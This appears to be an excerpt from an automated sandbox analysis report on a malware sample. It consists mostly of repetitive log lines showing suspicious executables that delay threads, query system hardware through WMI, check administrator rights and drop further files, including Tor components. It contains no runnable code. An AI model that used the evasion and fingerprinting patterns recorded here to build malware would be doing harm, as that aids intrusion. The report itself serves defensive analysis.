Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596725s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596592s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596479s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596374s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596124s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -596016s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595887s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595776s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595668s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595544s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595437s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595213s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -595095s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594850s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594616s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594507s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594390s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594258s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594143s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -594014s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -593897s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -593791s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -593676s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 2148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe TID: 2756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe TID: 4856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe TID: 4864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\39D.exe TID: 3872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4828	Thread sleep count: 3213 > 30
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599886s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599777s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599662s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4828	Thread sleep count: 932 > 30
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599433s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599323s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599213s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -599110s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598954s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598829s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598703s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598588s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598452s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598230s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -597905s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -597782s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -597657s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -597546s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -597433s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 4940	Thread sleep time: -597282s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 5308	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\932079.exe TID: 5776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 1904	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 5348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 5328	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599311
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599201
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598641
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597858
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597739
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597615
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597349
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596969
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596797
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596572
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596467
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 596130
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595853
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595712
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595608
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595384
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 595029
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594914
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594578
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594224
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 594094
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593952
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593734
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593620
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 593516
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599653
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598860
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597939
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597800
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597657
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597530
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597417
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597299
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596725
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596592
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596479
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595887
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595776
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595668
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595544
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595213
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 595095
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594850
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594616
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594507
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594258
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594143
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 594014
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 593897
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 593791
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 593676
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599886
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599777
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599662
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599433
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599323
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599213
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598954
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598829
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598588
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598452
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598230
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597782
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597657
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597433
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 597282
Source: C:\Users\user\AppData\Local\932079.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 3120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 2124	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 434
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4077
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1841
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 834
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Window / User API: threadDelayed 1390
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Window / User API: threadDelayed 864
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window / User API: threadDelayed 5822
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window / User API: threadDelayed 3901
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Window / User API: threadDelayed 3372
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Window / User API: threadDelayed 6296
Source: C:\Users\user\AppData\Local\932079.exe	Window / User API: threadDelayed 3213
Source: C:\Users\user\AppData\Local\932079.exe	Window / User API: threadDelayed 932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Window / User API: threadDelayed 3794

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_1-2575
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-2452
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_2-2452

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	API coverage: 7.0 %
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	API coverage: 3.5 %

Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\932079.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\8427.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\latestX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\853C.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_extra-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\616D.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\61F6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_core-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-gencert.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599311
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599201
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Thread delayed: delay time: 598641
